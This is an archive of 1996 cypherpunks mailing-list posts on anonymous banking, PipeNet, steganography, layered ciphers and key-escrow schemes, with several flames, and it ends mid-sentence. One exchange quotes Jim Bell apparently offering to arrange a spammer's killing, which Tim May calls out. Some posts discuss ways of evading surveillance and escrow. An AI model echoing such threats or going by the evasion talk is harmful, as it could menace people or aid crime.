iQCVAwUBMmLaEBvikii9febJAQHzUAQAlx3fro7Px/wY6cAIgkVmBWkEcYy1jun6
gLmhC2QiGdf/Abjz8Jc1H2UU5MIOPTRjGhYQf0V+8iCWvSSqutxidLmG668ThTaV
SqYhaloxbTui1yF6OtXLpiXIf+JfnV/5wgAaTKnEiAj3P9uEFZhz1yqi22g7bait
CFJ9jMeqTXg=
=r94m
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 14 Oct 1996 16:13:46 -0700 (PDT)
To: jim bell <jimbell@pacifier.com>
Subject: Re: Blinded Identities [was Re: exporting signatures only/CAPI]
In-Reply-To: <199610141859.LAA08217@mail.pacifier.com>
Message-ID: <Pine.SUN.3.94.961014190424.29677C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 14 Oct 1996, jim bell wrote:

> At 04:01 AM 10/14/96 -0400, Black Unicorn wrote:
> >On Sun, 13 Oct 1996, jim bell wrote:
> >
> >> At 04:28 PM 10/13/96 -0400, Michael Froomkin - U.Miami School of Law wrote:
> >> >It is unpublished, but he kindly allowed to me describe it in a paper I
> >> >wrote that discussed whether a bank would ever want to take the risk of
> >> >allowing bank accounts where it did not know the identity of the customer.
> >
> >> And I don't think that a bank can ever be embarrassed (assuming bank 
> >> accounts are anonymous) by it being revealed that some particular bad guy 
> >> kept his money there, any more than other cash-based (anonymous) businesses 
> >> are embarrassed if it is revealed that some bad guy used their services.
> >
> >I would refer you to Union Bank of Switzerland in the late 80's
> >(kidnapping), BCCI (drug and intelligence money), BMI (drug
> >money/offshore insurance fraud), PNC Bank (accounting fraud), and a host
> >of others I won't bother to list.  Banks do suffer from these disclosures,
> >in many cases quite severely.  (PNC bank was nearly ruined by their fraud
> >harboring disclosures). 
> 
> Are you talking about ANONYMOUS accounts, or merely CONFIDENTIAL ones?  
> (Anonymous accounts, as I use the term, are ones in which even the bank doesn't 
> know the owner.)  I think you're lumping these two things together; I was not.

Nor am I.
Most accounts during the period where the above incidents caused problems
were opened by proxy then transfered repeatedly.  The use of Swiss
"passbook" accounts in collecting kidnapping randsome was epidemic in the
1970s and 1980s.  These accounts, as they are bearer based and opened
through proxy, were entirely anonymous.

Many examples of effectively and literally anonymous accounts existed in
the 1970s and 1980s.

BCCI was famous for not caring who the account holder was, and shell
corporations were shamelessly used to conceal deposit taking and account
management by depositors who weren't satisified with trusting BCCI's
reputed "disinterest."

Again, Mr. Bell, I understand the temptation to try and create
otherwise absent facts to support your argument, but please learn the
subject before you start running at the mouth.

> 
> Jim Bell
> jimbell@pacifier.com
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 14 Oct 1996 19:24:54 -0700 (PDT)
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: crypto wish list (was Re: A "RIGHT" to strong crypto?)
In-Reply-To: <199610142041.VAA00167@server.test.net>
Message-ID: <Pine.3.89.9610141926.A14825-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain





On Mon, 14 Oct 1996, Adam Back wrote:
[Quoting Uni]
> > Where are anonymous and encrypted WWW clients and hosts which permit
> > chaining?
> 
> Folks working on this?

As always when this question comes up, I give this answer:
The only idea that seems to address the issue of chaining of realtime 
connections is Wei Dai's PipeNet. However, Wei doesn't have the time to 
turn it into code. Neither do I. But my offer from years ago still 
stands: I will fully finance the *second* node running PipeNet.

For newcomers, PipeNet is a "remailer" for IP. You use constant bandwidth 
pipes to conceal traffic. To be useful in any way, PipeNet requires at 
least a dedicated T1.


--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 14 Oct 1996 19:27:10 -0700 (PDT)
To: roy@scytale.com
Subject: Re: "Drift net fishing," GAK, FBI, and NSA
In-Reply-To: <961014.190532.7u9.rnr.w165w@sendai.scytale.com>
Message-ID: <Pine.3.89.9610141922.A14825-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain





On Mon, 14 Oct 1996, Roy M. Silvernail wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In list.cypherpunks, unicorn@schloss.li writes:
> 
> > Any idea what the basis for refusing "debit" cards is?
> 
> None whatsoever.
I had that happen to me as well. Perhaps debit cards don't allow for 
"holds", such as are typically used for deposits?

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 14 Oct 1996 20:24:28 -0700 (PDT)
To: Cypherpunks <cypherpunks@toad.com>
Subject: WOW!
Message-ID: <Pine.SUN.3.91.961014195648.7904A-100000@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

I just totaled up the "Bring Dimitri to San Francisco" pledges.
The pledges add up to an amazing US$681 and some guava pastries.
Airfair should be around US$300.  That, plus hotel should come
in under the amount pledged so far.  I'd still like additional
pledges, however,  I want to be certain we're covered and as an 
expression of the mood of the list. 

I intend to front the entire amount myself and then ask the
"pledge partners" for a pro rated payment based on the actual
cost and their proportionate pledge amount.  

It's interesting to me that several pledges have come from list
members who are far removed from San Francisco.  One or two of
them plan to attend Dimitri's meeting, but most just want to
have it happen.  I've only had one request for anonymity, but I
have kept names confidential without a clear go-ahead from them.
(If you have already pledged or pledge in the future, please let
me know if you mind if I post your name/nym.)

Now there's only one thing missing--Dimitri's response.  My open
letter to him contained an explicit and unambiguous invitation
to address a Cypherpunk meeting on any topic he wanted.  I asked
him for a clear yes or no, but have received nothing.  Perhaps
Dimitri prefers shooting from ambush.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.FL.us>
Date: Mon, 14 Oct 1996 17:21:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RFC2015 on MIME Security with PGP (fwd)
Message-ID: <Pine.OSF.3.91.961014202320.27862A-100000@fn3.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Mon, 14 Oct 96 14:18:26 PDT
From: RFC Editor <rfc-ed@ISI.EDU>
To: rfc-dist@ISI.EDU
Cc: rfc-ed@ISI.EDU
Subject: RFC2015 on MIME Security with PGP

A new Request for Comments is now available in online RFC libraries.

        RFC 2015:
        Title:      MIME Security with Pretty Good Privacy (PGP)
        Author:     M. Elkins
        Date:       October 1996
        Mailbox:    P.O. Box 92957 - M1/102
                    Los Angeles, CA 90009-2957
        Pages:      8
        Characters: 14,223
        Updates/Obsoletes:  None

        URL:        ftp://ds.internic.net/rfc/rfc2015.txt

This document describes how Pretty Good Privacy (PGP) can be used to
provide privacy and authentication using the Multipurpose Internet
Mail Extensions (MIME) security content types described in RFC1847.

This is now a Proposed Standard Protocol.

This document specifies an Internet standards track protocol for the
Internet community, and requests discussion and suggestions for
improvements.  Please refer to the current edition of the "Internet
Official Protocol Standards" (STD 1) for the standardization state and
status of this protocol.  Distribution of this memo is unlimited.

This announcement is sent to the IETF list and the RFC-DIST list.
Requests to be added to or deleted from the IETF distribution list
should be sent to IETF-REQUEST@CNRI.RESTON.VA.US.  Requests to be
added to or deleted from the RFC-DIST distribution list should
be sent to RFC-DIST-REQUEST@ISI.EDU.

Details on obtaining RFCs via FTP or EMAIL may be obtained by sending
an EMAIL message to rfc-info@ISI.EDU with the message body 
help: ways_to_get_rfcs.  For example:

        To: rfc-info@ISI.EDU
        Subject: getting rfcs

        help: ways_to_get_rfcs

Requests for special distribution should be addressed to either the
author of the RFC in question, or to admin@DS.INTERNIC.NET.  Unless
specifically noted otherwise on the RFC itself, all RFCs are for
unlimited distribution.

Submissions for Requests for Comments should be sent to
RFC-EDITOR@ISI.EDU.  Please consult RFC 1543, Instructions to RFC
Authors, for further information.


Joyce K. Reynolds and Mary Kennedy
USC/Information Sciences Institute

...

Below is the data which will enable a MIME compliant Mail Reader 
implementation to automatically retrieve the ASCII version
of the RFCs.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Mon, 14 Oct 1996 16:04:28 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Spook O.T.M.?
Message-ID: <Pine.3.89.9610142144.B15310-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 14 Oct 1996 21:11:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Killing Mr. Wallace of "Savetrees"?
In-Reply-To: <199610150209.TAA27055@mail.pacifier.com>
Message-ID: <v03007800ae88ce3644c9@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


It looks like Jim Bell is arranging a contract on Mr. Wallace (apparently
the operator of "abusebot@savetrees.com," and other obnoxious spambots
assocated with Cyberpromo).

At 7:06 PM -0800 10/14/96, jim bell wrote:
>At 04:26 PM 10/14/96 -0400, Ray Arachelian wrote:
>>On Sun, 13 Oct 1996, Roy M. Silvernail wrote:
>
>>
>>I'd like to join you on this.  I have sent email to
>>wallace@asswipespamnet already as well as left them voice mail for every
>>message they sent, they will be charged $500 per message and the next one
>>I receive constitutes acceptance.  I've since then recieved about 4-5
>>more, which means they owe me $2000 or thereabouts. :)
>>
>>So what steps do we need in putting some teeth into this?
>
>"You rang, Sir?"

Careful, Jim, you are coming _very_ close to crossing the line. You appear
to be volunteering to have Mr. Wallace (and perhaps his family?) killed.

Arguing theoretical implications of what you call "AP" is substantially
different from saying "You rang?" when your frequent posts about AP being
the solution make it clear you are referring to AP here.

I'm not a lawyer, but this is getting real close to the line. I doubt many
DAs would take it seriously, but I rather expect Mr. Wallace of
savetrees.com might discover this message and draw the reasonable inference
that his life is being threatened.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 14 Oct 1996 21:31:39 -0700 (PDT)
To: Eric Verheul <um@c2.net>
Subject: RE: binding cryptography
Message-ID: <199610150431.VAA08201@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:16 PM 10/14/96 +-100, Eric Verheul wrote:


>BTW, some people on the cypherpunks list seem to think that you can't 
fraude with a *voluntary* system. However, that is possible: when you do not 
comply with the *agreed* rules of conduct then the phrase "fraude" is 
appropriate. 

No, it probably isn't.  I don't know if you're basing your opinions on some 
Dutch variant of contract law, but as I understand it in order for there to 
be "fraud" there has to be a contract of some sort.  I'm sure a REAL LAWYER 
(TM) will correct me if I'm wrong, but to have a contract you first must 
have an agreement, and the parties must either go to an inconvenience or 
receive a benefit as a consequence of that agreement.  

Specifically, let's suppose I'm asked to limit myself to sending encrypted 
messages using some sort of standardized, GAK'd system.  Assuming I am 
willing, I then have to receive some benefit from that agreement (or the 
other guy must go to some inconvenience) or else there's no contract and no 
fraud if I cease operating according to that agreement.

However, there's a problem:  What benefit am I supposed to get sending GAK'd 
messages?  If it's nothing, then there's no contract.  (Besides, why should 
I agree to any "voluntary" agreement if I don't benefit in some way?)  If, 
on the other hand, I get my messages handled by some faster route, or get 
cheaper Internet service, that constitutes a benefit, but at that point 
people who don't agree are disadvantaged compared to those who agree.  
Problem is, this constitutes a subsidy of people who are willing to give up 
their freedom by people who aren't, and I suggest that there's at least an 
ethical problem with that, if not a legal or Constitutional problem.

And there's a contradiction:  You said the system was supposed to be 
"voluntary."  The more government pays (money, service, etc) people to 
agree, the less "voluntary" it is.  To cite an analogy, suppose the 
government offered money to anyone who agreed to sign away his free-speech 
rights, to be paid for by taxes collected by the general population.  Raise 
the payments and the taxes high enough, and nobody could afford to NOT sign 
away those rights.  This doesn't sound "voluntary," now does it?


>>Can you imagine that anyone would ever create a program that tries to
>>look like a conforming implementation, but generates invalid "binding"
>>data -- when it is so much easier to simply use PGP, and (if
>>necessary) disguise that fact using the government-approved encryption
>>software?  I don't, so in my opinion the verification process is
>>abolutely useless.
>Can you imagine what would happen if governments would (help to) set up a 
>system that has no safeguards at all, i.e.  that could give criminals all 
>the anonimity and confidentiality they need?


"all the anonimity and confidentiality they need?"      All they need to 
what?  By its very nature, encryption is more easily used to defend oneself 
against crime, than to commit crime.   It's related to the difference 
between the difficulty of doing an encryption/decryption, compared with the 
difficulty of decrypting a message by finding the key that you don't already 
know.  This can be a factor of well over a trillion more difficult.  This is 
one reason that most of the people on CP don't fear the widespread 
development and deployment of good encryption, which I think most of us 
would acknowledge can't help but "assist criminals" in some proportionately 
small way.


> Governments can't probably prevent criminals and the like to use encryption 
>to stay out of sight of law enforcement agencies, but they should not 
>facilitate them either. In the next few years all kinds of "standard" 
>commerical software will come on the market with all kinds of standard 
>security in it. I don't want criminals to be happy with Custom of The Shelf 
>products for security, let them work for their security.

"Criminals" are generally happy with off-the-shelf guns, or cars, or many 
other products.  I don't think you have a hope keeping them unhappy with 
off-the-shelf encryption.


>We have set up the TRPs in such a flexible way that anybody could find one 
>he can trust, one might even set up his own TRP. Also in the paper we 
>describe how two or more TRPs could be used. Maybe some countries don't want 
>TRP at all. The bottom line is that law-abiding citizens always have to give 
>up some of their freedom to stop criminals (that is why you have to have 
>registration plates on your car, a lock on your car, bicycle, house etc.).

I disagree.  The very act of using good cryptography can help protect assets 
without giving up freedom.  If it helps me more than it might potentially 
hurt me, then in fact I've GAINED freedom, not lost it.


>Also, I am *not* for a mandatory system.

However, given the tendency for governments to redefine the meaning of the 
terms, it is irrelevant that you claim to oppose a "mandatory" system.  In 
fact, it would be with tricks like your invention that governments would 
adopt a mandatory system that is called "voluntary."  


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 14 Oct 1996 15:56:03 -0700 (PDT)
To: unicorn@schloss.li
Subject: crypto wish list (was Re: A "RIGHT" to strong crypto?)
In-Reply-To: <Pine.SUN.3.94.961014020541.28315F-100000@polaris>
Message-ID: <199610142041.VAA00167@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn <unicorn@schloss.li> writes:
> [avoiding government is the only way]
>
> 2: Avoid the Government
> 
> I am convinced this is the only answer.  It has essentially always been
> the cypherpunk answer.  "Cypherpunks write code."  Cypherpunks get it
> done.  etc.  Get the genie out of the bottle and keep it there.  This is
> PGP, this is ssh, this is SSL, this is mixmaster, this is remailers.  Get
> it out, get it working, get there first.
> 
> Ok.  We got some of it there.  Now what?  The lead time on crypto is about
> up.  In my estimate regulation will be in place by 1998, if not earlier.
> Remember that in many countries regulation already exists.
> 
> Efforts put on resisting or moderating crypto are fine.  Political action
> is fine.  Even so I submit that technological action is more important at
> this stage.  The delaying games are about over.
> 
> Where is highly sophisticated stego?

Good stego is difficult.  Very low bandwidth stego is doable, but
stego of reasonable bandwidth, and good plausible deniablity is
difficult.

What are our options?

- Stego in english text.

Highly desirable, but very difficult, I think.

- Stego in audio and graphic file formats

Easier.  Not so much plausible deniability.  You've got to scan your
own pictures, and post lots of them.  (Become an avid
alt.binaries.pictures.* poster?)

- Stego in Internet Phone protocols.

Bill Stewart discussed some of the problems with this a short while
ago.  If I recall the basic problem is that the higher quality lossy
audio compression CODECs, which typically get used for low bandwidth
(28.8k and below modems) to get reasonable quality, don't have that
much room left, as they are compressing, and lossy, and by design
trying to leave as little as possible redundancy left.

I have also seen claims made for digital watermarking, that if enough
channels and redundancy is used, that digital watermarking survives
all kinds of abuse, analogue reproduction and redigitizing, etc.

Digital watermarking that I have seen discussed most involves image
files.  Is there any published work on digital watermarking of audio
files?

It would be interesting to see if any audio watermarking techniques
survives internet phone CODECs.  However, the problem still is that
the two aims are in tension: stego is trying to make the fact that the
data is there at all undetectable, the main aim with watermarking is
that you not be able to remove all traces of watermarking, and the way
that this is achieved is to spread the watermarking through many
channels.  The fact that there is watermarking in the document is not
necessarily being concealed, the primary aim is to stop removal, and
encode the watermark so that the image is not appreciably damaged
visually.

- Stego in Internet video conference formats

This kind of technology is difficult for similar reasons to that of
audio.

Also the technology is a bit premature, I don't think you would be
able to get a very good frame rate of high resolution video over a
28.8k modem.

> Where are larger keys for symetric ciphers?

The recent discussion on using IDEA with larger keys, or using 3IDEA
(triple IDEA) might be one way to get larger key spaces.

Peter Gutmann's MDC or the Luby-Rackoff method for constructing a CBC
mode block cipher from hash functions are another way.  However,
Schneier, in AC2 voices concerns about basing ciphers on hashes
because the design goals for hashes are different from those for
symmetric ciphers.

I would be interested to discuss the options of combining
cryptosystems so that the resulting cipher is as strong as the
strongest of the used ciphers.

For instance ways to combine IDEA, 3DES, and MDC say, such that all 3
have to be thoroughly broken before the combination is broken.

How good is simple multiple encryption:

	C = IDEA( key1, 3DES( key2, MDC( key3, M ) ) )

The same question for public key, how good is:

	C = RSA( pk1, ElGamal( pk2, Rabin( pk3, M ) ) )

mixing in a PK system based on a hard problem other than one based on
discrete logs / factoring would be nice also, in case there turn out
to be problems in this area.

Also Schneier has this one:

generate a one-time pad P, XOR it with the data M, then:

	C = IDEA( P ) || 3DES( P XOR M )

generating the pad is left as an exercise to the reader (just
remember, you need at least 112 + 128 bits of security).

Also this has the problem that it doubles the message size, but it is
guaranteed to be as hard to break as breaking both IDEA and 3DES (or
whatever algorithms it is you are using).

Also another problem for all of this, you need really top quality
random number generators, to get full use from your long key length
algorithms.

> Where is a fully functional and secure "stealth PGP"?

PGP stealth 2.01 beta is at: http://www.dcs.ex.ac.uk/~aba/stealth/

It is not release quality.

I've been meaning to fix that for a while now, a release version will
be out RSN.

Do you, or anyone else who is interested see any advantage in having
stealth functionality integrated into PGP, say as a patch for PGP263i
/ mit PGP262?  Not that hard to do, if there's any interest for it to
be integrated.

Zbigniew Fiedorowicz <fiedorow@math.mps.ohio-state.edu> added stealth
and SHA1 support directly to a MAC version of PGP.  The key words `fat
mac pgp' in a www search engine would probably find it.  Or `Zbigniew
pgp'?

> Where are anonymous and encrypted WWW clients and hosts which permit
> chaining?

Folks working on this?

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.net (Ulf Moeller)
Date: Mon, 14 Oct 1996 12:53:39 -0700 (PDT)
To: everheul@mail.rijnhaave.nl
Subject: binding cryptography
Message-ID: <9610141953.AA27896@public.uni-hamburg.de>
MIME-Version: 1.0
Content-Type: text/plain


   liberal (Japan) to non-liberal (France). We believe that "binding
   cryptography" is flexible enough to achieve this: a liberal crypto
   policy might use no Trusted Retrieval Parties at all, while a very
   non-liberal country might want one (government controlled) TRP, a
   compliance check on all network traffic and a ban on other crypto.

I doubt that even French internet providers would want their routers
to perform six modolo exponetiations and four modolo divisions
whenever someone opens a secure socket...

   We offered a solution for the *first* task not for the *second*; the
   point is that criminals(!) do not gain any real advantage from using
   the system in that way as they - among other things - still face the
   key-management problem. The above dicussions are only relevant in
   countries where the use of crypto outside the structure would be
   prohibited.

Of course, criminals do get real advantage from this system. They can
use strong encryption for their messages and super-encrypt them using
"binding" cryptography. So their illegal messages look perfectly
inconnous as long as their government trusts in the "binding" property
of this scheme. Only when the GAK key holder tries to decrypt a
message, they notice that they cannot read it.

Can you imagine that anyone would ever create a program that tries to
look like a conforming implementation, but generates invalid "binding"
data -- when it is so much easier to simply use PGP, and (if
necessary) disguise that fact using the government-approved encryption
software?  I don't, so in my opinion the verification process is
abolutely useless. One might say, binding cryptography, like several
other cryptographic protocols, is a nice 'solution', but one with no
corresponding 'problem' in the real world. :)  It doesn't help in
legitimate law enforcement, but it causes trouble to network operators
and it deprives law-abiding citizens of their privacy.

And criminals don't face "the key-management problem". In any GAK
scheme, the official keys can be used to certify other un-escrowed
encryption keys. Binding cryptography makes it just a little easier,
because there is no need to create any "illegal" key pairs. Everyone
can encrypt messages using the government-certified ElGamal keys,
and then repeat that process, this time including the data required
for goverment access.

   that use of other systems will always be possible. Also, the above
   discussions already showed that if such a system is voluntary, then
   there are lots of way to go around it.

Criminals will always find ways around these systems -- even if they are
mandatory. Just those who actually "have nothing to fear", will not
go in the risk to use illegal encryption. So governments can wiretap
law-abiding citizens, but not criminals. What useful is a system like
that?

-- 
one ring to rule them all, one ring to find them
one ring to bring them all and in the darkness bind them
in the land of mordor where the shadows lie.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 14 Oct 1996 22:13:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Cynthia Dwork talk: Non-Malleable Cryptography
Message-ID: <199610150513.WAA00757@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the late post.  I'm way behind in reading my mail.

Bill
--------------Begin forwarded message---------------------
Date: Mon, 14 Oct 1996 09:27:14 -0700
From: "Francois V. Guimbretiere" <francois@cs.stanford.edu>
X-Mailer: Mozilla 2.01 (X11; I; Linux 1.3.48 i586)
To: secure@lists.Stanford.EDU, colloq@cs.stanford.edu
Subject: Cynthia Dwork talk: Non-Malleable Cryptography
Sender: owner-secure@lists.Stanford.EDU
Precedence: bulk

Title: Non-Malleable Cryptography
 Speaker: Cynthia Dwork, IBM Almaden Research Center
    Time: Tuesday 15 Oct 1996, 4:15pm, Gates 104

ABSTRACT:
The notion of {\it non-malleable} cryptography,
an extension of semantically secure cryptography,
will be defined.
Informally, in the context of encryption
the additional requirement is that
given the ciphertext it is impossible to generate
a {\it different} ciphertext so that the respective
plaintexts are related.
Common public key cryptosystems are quite malleable:
for example, in RSA it is trivial to compute
$E(2x)$ given only $E(x)$.
Although defined with public key cryptography in mind,
non-malleability issues also arise in private-key cryptography.
Indeed, the security of
many common protocols, such as Kerberos, relies
implicitly on the inability of an adversary to compute $E(f(N))$
given only $E(N)$, for simple functions $f$.
The talk will focus on non-malleable public key cryptosystems.
with a few remarks on non-malleable schemes for
private-key cryptography, string commitment,
and proofs of possession of knowledge.

This is joint work with Danny Dolev and Moni Naor.
==========================================================================
This message was posted through the Stanford campus mailing list
server.  If you wish to unsubscribe from this mailing list, send the
message body of "unsubscribe secure" to majordomo@lists.stanford.edu




-------------------------------------------------------------------------
Bill Frantz       | Tired of Dole/Clinton?     | Periwinkle -- Consulting
(408)356-8506     | Vote 3rd party.  I'm       | 16345 Englewood Ave.
frantz@netcom.com | Voting for Harry Browne    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 14 Oct 1996 22:28:31 -0700 (PDT)
To: Alex Filacchione <alexf@iss.net>
Subject: Re: LET'S MEET DIMITRI (WHO CARES?)[RANT]
In-Reply-To: <01BBB9EE.A19A0040@alexf.iss.net>
Message-ID: <32632092.10EF@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Alex Filacchione wrote:
> <FLAME>
> Hmm.  Maybe I am missing something.  Can someone please explain to me
> exactly WHAT relevance this has to the list?
> People, I really DON'T CARE what your opinions are of Tim May, or
> anyone else for that matter!!!  Can you please stop acting like
> children in a playground name-calling contest and move on to something
> else?  Something of relevance to the list please?  If you absolutely
> *HAVE* to continue to act like children then take it to private email.
>  If for nothing else, then to save YOURSELVES from embarrassment.
> </FLAME>

[snip, snip]

Pardon me, Alex (and other fellow "flame"rs), but the ranting, 
name-calling, acting like children, etc. are ALL (repeat, ALL) much more 
interesting to read than the self-pitying, self-centered slobbering 
you're adding to the list.  If you could *not* be a child yourself for 
just a little bit, you could go do something worthwhile, like feed the 
homeless or something.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 14 Oct 1996 19:51:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: L.Detwieler
In-Reply-To: <199610141907.MAA03847@count04.mry.scruznet.com>
Message-ID: <qmJTVD61w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


cypherpunks@count04.mry.scruznet.com writes:

> why are you spamming the list???

Why is Timmy May spamming the list with lies, personal attacks, and
inane incoherent rants, none of which have to do with cryptography?

>     cheers... a cypherpunk

No longer something to be proud of.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Mon, 14 Oct 1996 13:36:09 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: COMMUNITY CONNEXION SUED IN FRIVOLOUS LAWSUIT
In-Reply-To: <199610141819.LAA28460@atropos.c2.org>
Message-ID: <199610142036.VAA18778@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Sameer:

I hope your legal defense fund will be accepting Ecash
donations, for at least two reasons.


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMmKkM0jbHy8sKZitAQGEuAL7BK7psEo6nABomLDvy1FSjKiDcGCnZ6df
MGLUqUXVOvsTJ+m2uyWnV6AeB96eH+xcYqTMCpNIQoUNlJAKVBIUJLX71mOGC52D
20ZnVdppZEQoTX7PSjcOuDZsheUSvv9a
=mRvL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Mon, 14 Oct 1996 20:45:00 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Blinded Identities [was Re: exporting signatures only/CAPI]
In-Reply-To: <Pine.SUN.3.94.961014035114.28315K-100000@polaris>
Message-ID: <199610150402.XAA31611@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.SUN.3.94.961014035114.28315K-100000@polaris>, on 10/14/96 at 04:01 AM,
   Black Unicorn <unicorn@schloss.li> said:

>On Sun, 13 Oct 1996, jim bell wrote:

>> At 04:28 PM 10/13/96 -0400, Michael Froomkin - U.Miami School of Law wrote:
>> >It is unpublished, but he kindly allowed to me describe it in a paper I
>> >wrote that discussed whether a bank would ever want to take the risk of
>> >allowing bank accounts where it did not know the identity of the customer.

>> And I don't think that a bank can ever be embarrassed (assuming bank 
>> accounts are anonymous) by it being revealed that some particular bad guy 
>> kept his money there, any more than other cash-based (anonymous) businesses 
>> are embarrassed if it is revealed that some bad guy used their services.

>I would refer you to Union Bank of Switzerland in the late 80's
>(kidnapping), BCCI (drug and intelligence money), BMI (drug
>money/offshore insurance fraud), PNC Bank (accounting fraud), and a host of others I
>won't bother to list.  Banks do suffer from these disclosures, in many cases quite
>severely.  (PNC bank was nearly ruined by their fraud harboring disclosures).  Why
>exactly is it that you think frauds,
>seizures, compelled customer referrals and the like go unreported to the authorities
>in something like 75% of the cases?  Why exactly is it that you think banks seek to
>open offshore branches with autonomy and distance from the home branches?  Answer:
>Banking is as much about confidence as any business can be.  Anonymous or not, the
>presence of funds which
>infringe on regulations in one area or another are frightening to normal banking
>customers.

BULL!!!!

There are only two things the banking customers care about:

1. Will my money be there in the morning?

2. What is my rate of return?

The rest of it is a bunch of Govenment & Media hype & bull shit!!

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
*MR/2 ICE: Windows?  Homey don't play that!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 14 Oct 1996 22:50:19 -0700 (PDT)
To: Steve Schear <azur@netcom.com>
Subject: Re: crypto wish list (was Re: A "RIGHT" to strong crypto?)
In-Reply-To: <v02130500ae8830318248@[10.0.2.15]>
Message-ID: <Pine.3.89.9610142243.A8394-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain





On Mon, 14 Oct 1996, Steve Schear wrote:
[On a PipeNet like design, but without the traffic analysis defending 
features.]
> The shortcoming of Ray's approach is that it requires intermediate servers
> to re-route all client-server packets and therefore someone must provide
> that, considerable, bandwidth for free or fee.

As I said, I'll fund the second node. But I don't expect somebody to 
